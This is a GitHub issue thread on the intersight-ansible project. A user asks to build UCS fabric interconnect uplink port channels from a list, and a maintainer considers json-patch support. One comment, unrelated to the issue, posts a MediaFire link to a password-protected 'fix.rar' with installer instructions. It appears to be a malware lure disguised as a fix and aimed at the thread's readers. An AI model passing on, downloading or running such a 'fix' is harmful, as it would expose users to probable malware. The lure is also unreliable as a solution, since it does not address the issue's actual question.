### ISSUE TITLE
Ability to Build Uplinks from a List

### ISSUE THREAD

**Issue by jogeorg2** [CiscoDevNet/intersight-ansible#135]
When creating a UCS FI Port Policy and defining an uplink port channel, such as a network uplink port channel, when configuring ports, all the ports have to be placed in a single code block. I am requesting that this be changed to where you could create the uplink port channel, then add ports to it one at a time. This way you could have a list of uplink ports in the port channel and traverse the list adding them in. I am attaching a text version of my current task file to build the policy where I have brute force tasks to build either a 2, 4, or 8-port port channel.

[setup_fi_a_port_policy.txt](https://github.com/user-attachments/files/16751256/setup_fi_a_port_policy.txt)

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by dsoper2** [comment]
Partial updates would probably use json-patch which has a complex structure (https://us-east-1.intersight.com/apidocs/introduction/methods/#contenttype-applicationjsonpatchjson ).  With the default patch behavior list ops are a replace so gets would be needed 1st and the full list built before a patch.  I'll take a look at adding json-patch support.
